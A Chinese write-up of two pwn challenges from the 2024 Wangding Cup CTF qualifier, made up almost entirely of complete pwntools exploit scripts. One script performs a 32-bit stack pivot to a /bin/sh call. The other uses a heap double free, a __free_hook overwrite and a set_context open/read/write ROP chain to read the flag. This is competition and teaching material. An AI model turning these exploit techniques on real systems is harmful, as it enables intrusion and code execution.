2024网鼎杯青龙组线上资格赛Pwn

青龙组不卷,只做了两道简单的,剩下的太阴间了

pwn2

32位栈迁移

md一开始没看到给了/bin/sh,自己写在栈上的打不通

from pwn import *
# Target description: 32-bit non-PIE binary, verbose pwntools logging.
context(os='linux', arch='i386', log_level='debug')
context.terminal = ['tmux', 'sp', '-h']

# 0 -> talk to the remote instance, 1 -> spawn ./short locally.
local = 0
elf = ELF('./short')

if local:
    p = process('./short')
else:
    p = remote('0192d5f503467e5c9706966051c75907.tiud.dg10.ciihw.cn', 43656)

# Same libc object in both modes. NOTE(review): this is the x86_64 libc
# while the target is i386; the script below never uses `libc`, so it is
# harmless here, but it would be the wrong file for any libc-relative work.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# Thin I/O helpers around the global tube `p`; each looks `p` up at call
# time, so they keep working if `p` is re-bound later.
def sd(s):
    """Send raw data."""
    return p.send(s)


def sl(s):
    """Send data followed by a newline."""
    return p.sendline(s)


def sa(n, s):
    """Wait for marker *n*, then send *s*."""
    return p.sendafter(n, s)


def sla(n, s):
    """Wait for marker *n*, then send *s* plus a newline."""
    return p.sendlineafter(n, s)


def rc(n):
    """Receive up to *n* bytes."""
    return p.recv(n)


def rl():
    """Receive one line."""
    return p.recvline()


def ru(s):
    """Receive until marker *s* is seen."""
    return p.recvuntil(s)


def ra():
    """Receive everything until EOF."""
    return p.recvall()


def ia():
    """Hand the tube over to the user."""
    return p.interactive()


def uu32(data):
    """Unpack a (possibly short) little-endian 32-bit value, zero-padded."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Unpack a (possibly short) little-endian 64-bit value, zero-padded."""
    return u64(data.ljust(8, b'\x00'))

def lg(s):
    """Log *s* and its value (evaluated in this script's globals) as hex."""
    # eval is deliberate: *s* is always a literal name/expression written in
    # this script (e.g. "add"), never data received from the target.
    value = eval(s)
    success(f"{s} >> 0x{value:x}")

def bk(addr):
    """Attach gdb to `p` with a single breakpoint at absolute address *addr*."""
    breakpoint_cmd = f"b *{hex(addr)}"
    gdb.attach(p, breakpoint_cmd)

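def debug(addr, PIE=False):
    """Attach gdb to `p` with a breakpoint at *addr*.

    Args:
        addr: breakpoint address. With ``PIE=True`` it is an offset that is
            added to the first mapping reported by ``pmap``; otherwise it is
            used as an absolute address.
        PIE: whether to rebase *addr* on the process's first mapping.
    """
    if PIE:
        # pmap prints a header line first; line [1] is the first mapping,
        # taken here as the image base (assumes the text segment maps first
        # -- TODO confirm for this binary). The pipe is closed via `with`
        # instead of being leaked.
        with os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)) as pipe:
            text_base = int(pipe.readlines()[1], 16)
        gdb.attach(p, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(p, "b *{}".format(hex(addr)))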


# Addresses taken from the non-PIE 32-bit binary. `gift` and `ret` are
# assigned but not used by the payload below.
gift = 0x80485E6
leave_ret = 0x08048555
ret = 0x080483fa
# Login step of the service (credentials as the service expects them).
sla("Enter your username: ","admin")
sla("Enter your password: ","admin123")
#debug(0x8048675)
# The service prints an address after this prompt (10 chars, "0x..."); it is
# presumably the address of the buffer the next input lands in -- TODO confirm.
ru("You will input this: ")
add = int(rc(10),16)
lg("add")

# First two dwords are what execution finds once the stack has been moved to
# `add`: a code address in the binary and 0x804A038 (presumably the /bin/sh
# string the writeup mentions -- TODO confirm). Padded to 0x50, which is
# assumed to be the distance to the saved ebp.
payload = p32(0x80485FF) + p32(0x804A038)
payload = payload.ljust(0x50,b'\x00')
# Saved ebp := add-4 and return into leave;ret -- the "32位栈迁移" of the title.
payload+= p32(add-4)+p32(leave_ret)
sa("plz input your msg:\n",payload)


ia()

pwn4

简单的堆orw,直接set_context

换2.35以上我早秒了QAQ

from pwn import *
# Target description: 64-bit binary, verbose pwntools logging.
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ['tmux', 'sp', '-h']

# 1 -> spawn ./pwn locally, 0 -> talk to the remote instance.
local = 1
elf = ELF('./pwn')

if local:
    p = process('./pwn')
else:
    p = remote('0192d6496a03783395106845917ed538.gqlw.dg06.ciihw.cn', 43668)

# The challenge ships its own libc; both modes load the same file.
libc = ELF('./libc.so.6')

# Thin I/O helpers around the global tube `p`; each looks `p` up at call
# time, so they keep working if `p` is re-bound later.
def sd(s):
    """Send raw data."""
    return p.send(s)


def sl(s):
    """Send data followed by a newline."""
    return p.sendline(s)


def sa(n, s):
    """Wait for marker *n*, then send *s*."""
    return p.sendafter(n, s)


def sla(n, s):
    """Wait for marker *n*, then send *s* plus a newline."""
    return p.sendlineafter(n, s)


def rc(n):
    """Receive up to *n* bytes."""
    return p.recv(n)


def rl():
    """Receive one line."""
    return p.recvline()


def ru(s):
    """Receive until marker *s* is seen."""
    return p.recvuntil(s)


def ra():
    """Receive everything until EOF."""
    return p.recvall()


def ia():
    """Hand the tube over to the user."""
    return p.interactive()


def uu32(data):
    """Unpack a (possibly short) little-endian 32-bit value, zero-padded."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Unpack a (possibly short) little-endian 64-bit value, zero-padded."""
    return u64(data.ljust(8, b'\x00'))

def lg(s):
    """Log *s* and its value (evaluated in this script's globals) as hex."""
    # eval is deliberate: *s* is always a literal name/expression written in
    # this script (e.g. 'libc_base'), never data received from the target.
    value = eval(s)
    success(f"{s} >> 0x{value:x}")

def bk(addr):
    """Attach gdb to `p` with a single breakpoint at absolute address *addr*."""
    breakpoint_cmd = f"b *{hex(addr)}"
    gdb.attach(p, breakpoint_cmd)

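def debug(addr, PIE=True):
    """Attach gdb to `p` with a breakpoint at *addr*.

    Args:
        addr: breakpoint address. With ``PIE=True`` (the default) it is an
            offset that is added to the first mapping reported by ``pmap``;
            otherwise it is used as an absolute address.
        PIE: whether to rebase *addr* on the process's first mapping.
    """
    if PIE:
        # pmap prints a header line first; line [1] is the first mapping,
        # taken here as the image base (assumes the text segment maps first
        # -- TODO confirm for this binary). The pipe is closed via `with`
        # instead of being leaked.
        with os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)) as pipe:
            text_base = int(pipe.readlines()[1], 16)
        gdb.attach(p, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(p, "b *{}".format(hex(addr)))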


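def rc4(data, key=b's4cur1ty_p4ssw0rd'):
    """Apply the RC4 keystream derived from *key* to *data*.

    RC4 is symmetric, so one call encrypts and a second call on the output
    decrypts. RC4 with a fixed key is not a sound cipher; it is reproduced
    here only to match the transform the service presumably applies to
    stored values (see the ``rc4(payload)`` call below -- TODO confirm
    against the binary).

    Args:
        data: bytes-like plaintext or ciphertext (iterates as ints).
        key: non-empty key bytes. Defaults to the challenge key so existing
            ``rc4(data)`` callers are unchanged.

    Returns:
        bytearray of the same length as *data*.

    Raises:
        ValueError: if *key* is empty (the original would raise
            ZeroDivisionError from ``i % len(key)``).
    """
    if not key:
        raise ValueError("rc4 key must not be empty")

    # KSA: permute the identity state vector under the key.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    # PRGA: one keystream byte per input byte, XORed in.
    i = j = 0
    output = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % 256]
        output.append(byte ^ K)

    return output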

def cmd(op):
    """Choose menu entry *op* at the service's "> " prompt."""
    choice = str(op)
    sla("> ", choice)

def add(index, size, content):
    """Menu 1: store *content* as a value of *size* bytes under key *index*."""
    cmd(1)
    prompts = (
        ("Input the key: ", str(index)),
        ("Input the value size: ", str(size)),
        ("Input the value: ", content),
    )
    for prompt, answer in prompts:
        sla(prompt, answer)

def show(index):
    """Menu 2: print the value stored under key *index*."""
    cmd(2)
    key = str(index)
    sla("Input the key: ", key)

def free(index):
    """Menu 3: release the value stored under key *index*."""
    cmd(3)
    key = str(index)
    sla("Input the key: ", key)

def edit(index, content):
    """Menu 4: overwrite the value stored under key *index* with *content*."""
    cmd(4)
    for prompt, answer in (("Input the key: ", str(index)),
                           ("Input the value: ", content)):
        sla(prompt, answer)


# Login step; credentials are sent raw, newline included.
sa("Input your username:",'4dm1n\n')
sa("Input your password:",'985da4f8cb37zkj\n')

# Allocate 12 values of 0xf0 bytes, then free keys 9..0 in reverse order.
# After this the stored values of keys 0 and 4 contain pointers the
# allocator wrote into the freed chunks (a libc address and a heap address
# respectively; which bin they come from depends on the libc version --
# TODO confirm).
for i in range(12):
    add(i,0xf0,'a'*8)

for i in range(10):
    free(9-i)

# Leak 1: the shown value is XOR-masked with a fixed 64-bit constant (the
# original comment gives 2e50a4b3e366e833); the low 6 bytes are read,
# unmasked, and a libc-layout-specific offset (0x3ebca0) subtracted.
show(0)
ru("The result is:\n\t[key,value] = [0,")
libc_base = (uu64(rc(6)[-6:]) ^ 0xa4b3e366e833) - 0x3ebca0 # 2e50a4b3e366e833
lg('libc_base')

# Leak 2: same unmasking; 0x1b70 is the heap-layout-specific offset.
show(4)
ru("The result is:\n\t[key,value] = [4,")
heap_base = (uu64(rc(6)[-6:]) ^ 0xa4b3e366e833) - 0x1b70 # 2e50a4b3e366e833
lg('heap_base')

# flag_addr is the leaked heap pointer itself, expected to be where the
# value stored under key 11 below lands; rop_addr is 0x100 past it, i.e.
# one 0xf0-sized chunk later (presumably the chunk that receives
# rc4(payload) below -- TODO confirm).
flag_addr = heap_base + 0x1b70
rop_addr = flag_addr + 16 + 0x100
# Gadgets are searched in the shipped libc at runtime; set_context is a
# hard-coded offset and therefore only valid for this libc build.
pop_rbp = libc_base + next(libc.search(asm('pop rbp;ret;')))
leave_ret = libc_base + next(libc.search(asm('leave;ret;')))
ret = libc_base + next(libc.search(asm('ret;')))
pop_rdi = libc_base + next(libc.search(asm('pop rdi;ret;')))
pop_rsi = libc_base + next(libc.search(asm('pop rsi;ret;')))
pop_rdx = libc_base + next(libc.search(asm('pop rdx;ret;')))
pop_rax = libc_base + next(libc.search(asm('pop rax;ret;')))
syscall_ret = libc_base + next(libc.search(asm('syscall\nret')))
stdout_addr = libc_base + libc.sym['_IO_2_1_stdout_']
stderr_addr = libc_base + libc.sym['_IO_2_1_stderr_']
libc_write = libc_base + libc.sym['write']
libc_read = libc_base + libc.sym['read']
free_hook = libc_base + libc.sym['__free_hook']
set_context = libc_base + 0x52085


# Re-take three of the freed chunks.
add(0,0xf0,'a'*8)
add(1,0xf0,'a'*8)
add(2,0xf0,'a'*8)

# Value layout: 16 bytes holding the flag path, then the open/read/write
# chain of the title ("orw"): open(flag_addr, 0) via syscall 2, read(3,
# flag_addr, 0x50), write(1, flag_addr, 0x50 -- rdx still set). Padded to
# 0xa0, then rop_addr and a ret gadget at +0xa0/+0xa8 -- the slots the
# set_context routine is assumed to load rsp and the return address from
# (TODO confirm for this libc).
payload = b'./flag.txt\x00\x00\x00\x00\x00\x00'
payload+= p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(pop_rax) + p64(2) + p64(syscall_ret)
payload+= p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x50) + p64(libc_read)
payload+= p64(pop_rdi) + p64(1) + p64(libc_write)
payload = payload.ljust(0xa0, b'a')
payload += p64(rop_addr)
payload += p64(ret)

add(11,0xf0,payload)


# Key 2 is freed twice (with key 1 in between), so the next edit of key 2
# writes into a chunk that is still on the free list.
free(2)
free(1)
free(2)

# The written pointer is XOR-masked with the same constant as the leaks,
# presumably undoing a transform the service applies on store -- TODO confirm.
edit(2,p64(free_hook^0x2e50a4b3e366e833))

# First allocation returns the chunk at key 2 (value RC4-transformed, see
# rc4()); the second lands on the address written above and stores the
# masked set_context address there.
add(0,0xf0,rc4(payload))
add(0,0xf0,p64(set_context^0x2e50a4b3e366e833))

# Freeing key 11 is what invokes the overwritten hook.
free(11)

ia()